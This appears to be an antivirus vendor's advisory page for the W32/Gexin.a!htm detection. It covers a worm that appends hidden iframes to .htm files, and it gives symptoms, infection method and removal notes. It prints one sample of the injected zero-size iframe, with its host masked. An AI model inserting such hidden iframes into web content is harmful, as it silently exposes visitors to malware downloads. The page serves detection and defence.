W32/Gexin.a!htm

This page shows details and results of our analysis on the malware W32/Gexin.a!htm

Download Current DAT: 6617

Threat Detail

Malware Type: Virus

Malware Sub-type: Win32

Discovery Date: 2007-07-03

Next Steps:

Overview
Characteristics
Symptoms
Method of Infection
Removal

Overview

This detection is for html files which have a malicious iframe inserted at the end of the file, caused by W32/Gexin.a worm.

Minimum DAT

5066 (2007-07-03)

Updated DAT

5178 (2007-12-05)

Minimum Engine

5.1.00

File Length

N/A

Description Added

2007-07-03

Description Modified

2007-12-06

Malware Proliferation

Characteristics

When an infected htm file is run, it silently attempts to connect to a list of pre-defined websites and download other malicious files from these sites.

These malicious iframes have the values for their height and width set as 0. This is done to avoid the users from noticing these malicious iframes when the infected .htm files are run in ?Internet Explorer?.

Symptoms

W32/Gexin.a!htm infected files will have an iframe inserted at the end of the file as below:

IfrAmE src=http://xxx.xxxxxx.com/[Removed] width=0 height=0 IfrAmE

Method of Infection

This worm searches the hard drive for files with the extension ?.htm? and infects them by adding a malicious iframe at the end of the file.

Removal

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.